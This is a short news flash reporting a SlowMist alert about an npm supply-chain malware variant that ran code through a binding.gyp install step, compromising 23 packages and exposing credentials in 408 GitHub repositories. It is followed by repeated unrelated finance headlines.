SlowMist issues npm supply chain attack alert, affecting 23 packages and stealing 408 GitHub repository credentials

The SlowMist security team has issued an alert stating that a variant of the Shai Hulu/Miasa/Hades npm malware is affecting the npm ecosystem and is related to the damaged npm developer account czirker. The attack utilized a pre configured binding.gyp file to execute malicious code during the npm install process. Currently, 23 affected packages have been confirmed, including 3140 weekly downloads of Leo logger, and 408 affected GitHub repositories containing stolen credentials have been detected.

24/7 Flashes

More >

Today 2026-06-25

09:54

SlowMist issues npm supply chain attack alert, affecting 23 packages and stealing 408 GitHub repository credentials

24/7 Flashes

TrendForce Consulting: Nvidia develops 800V Power Rack solution

Bank of America adjusts Bank of England's rate cut forecast, expecting a 0.25% cut in November 2027

Wells Fargo raises Goldman Sachs target price to $1195

HTX takes you to see hot coins: SYN heat rises, 24-hour increase of 32.57%

Circle plans to collaborate with Nomura Securities to provide real-time foreign currency settlement as early as 2027

24/7 Flashes

TrendForce Consulting: Nvidia develops 800V Power Rack solution

Bank of America adjusts Bank of England's rate cut forecast, expecting a 0.25% cut in November 2027

Wells Fargo raises Goldman Sachs target price to $1195

HTX takes you to see hot coins: SYN heat rises, 24-hour increase of 32.57%

Circle plans to collaborate with Nomura Securities to provide real-time foreign currency settlement as early as 2027